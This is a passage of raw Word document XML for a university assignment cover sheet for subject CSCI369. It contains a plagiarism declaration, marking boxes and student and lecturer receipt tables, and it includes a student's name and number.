                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:color w:val="990000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>PLEASE NOTE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>STUDENTS MUST RETAIN A COPY OF ANY WORK SUBMITTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4672" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5117878F" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="280" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:color w:val="990000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>DECLARATION: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">I/We certify that this is entirely my/our own work, except where I/we have given </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>fully-documented</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> references to the work of others, and that the material contained in this document has not previously been submitted for assessment in any formal course of study. I/we understand the definition and consequences of plagiarism.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB86633" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:before="280" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:color w:val="000099"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:color w:val="000099"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Signature of Student:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="419FD128" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00D03104">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>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D03104" w14:paraId="36D49071" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B27CE10" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9256" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9256"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D03104" w14:paraId="298EA2C8" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:trPr>
                <w:trHeight w:val="300"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3119102F" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:b/>
                      <w:color w:val="990000"/>
                      <w:sz w:val="17"/>
                      <w:szCs w:val="17"/>
                    </w:rPr>
                    <w:t>Optional </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:b/>
                      <w:color w:val="000099"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>Marks:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="20774110" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:trPr>
                <w:trHeight w:val="1050"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6007A5FA"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Comments:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1A07C31B" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13B60A48" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00D031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E6DBF56" wp14:editId="03522C00">
            <wp:extent cx="5943600" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="image1.gif" descr="https://my.uowdubai.ac.ae/images/scissors.gif"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.gif" descr="https://my.uowdubai.ac.ae/images/scissors.gif"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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D03104" w14:paraId="2853DB2C" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49B52DB8" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9256" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4628"/>
              <w:gridCol w:w="4628"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D03104" w14:paraId="2CF8C084" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="46A7C336" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:b/>
                      <w:color w:val="990000"/>
                      <w:sz w:val="17"/>
                      <w:szCs w:val="17"/>
                    </w:rPr>
                    <w:t>Lecturer Assignment Receipt </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(To be filled in by student and retained by Lecturer upon return of assignment)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="6A7A5864" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5DFE4FE2" w14:textId="7F4245E2"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Subject:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>CS</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>CI369</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="004B7955" w14:textId="2F0CABD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Assignment Title:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>Assessment 3: Assignment Cum Project</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="1F570278" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="729DDC1A" w14:textId="5560571C"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Student Name:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>Raheel Ahmed</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2D11CFA0" w14:textId="156B5E1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Student Number:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>8971134</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="7C038A41" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="68068B29" w14:textId="0663E56F"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Due Date:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9" w:rsidRPr="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                      <w:vertAlign w:val="superscript"/>
                    </w:rPr>
                    <w:t>th</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> June</w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>, 2026</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5E158E5E" w14:textId="5172DDC2"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Date Submitted:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9" w:rsidRPr="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                      <w:vertAlign w:val="superscript"/>
                    </w:rPr>
                    <w:t>th</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> June, 2026</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="44F51D5C" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2EDBE536"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Signature of Student:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0A743CF9" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="340C0219" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00D031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26EA2E4" wp14:editId="696BC2B8">
            <wp:extent cx="5943600" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="image1.gif" descr="https://my.uowdubai.ac.ae/images/scissors.gif"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.gif" descr="https://my.uowdubai.ac.ae/images/scissors.gif"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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D03104" w14:paraId="01B6B7F6" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BB94E20" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9256" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4628"/>
              <w:gridCol w:w="4628"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D03104" w14:paraId="05086B2C" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9256" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1EF701AF" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:b/>
                      <w:color w:val="990000"/>
                      <w:sz w:val="17"/>
                      <w:szCs w:val="17"/>
                    </w:rPr>
                    <w:t>Student Assignment Receipt</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> (To be filled in and retained by Student upon submission of assignment)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="3FAA4F7A" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:trPr>
                <w:trHeight w:val="240"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2F042D3C" w14:textId="1AFF7C1A"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Subject:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>CS</w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>CI369</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4E481DC1" w14:textId="0D7DBD3D"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Assignment Title:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="002037A9">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>Assessment 3: Assignment Cum Project</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00D03104" w14:paraId="3C6197C9" w14:textId="77777777" w:rsidTr="00556FA6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="03B7D769" w14:textId="4343648B"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Student Name:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>Raheel Ahmed</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4628" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="3ECF93B0" w14:textId="2CDA6864"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Student Number:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="00EE1BB6">
                    <w:rPr>
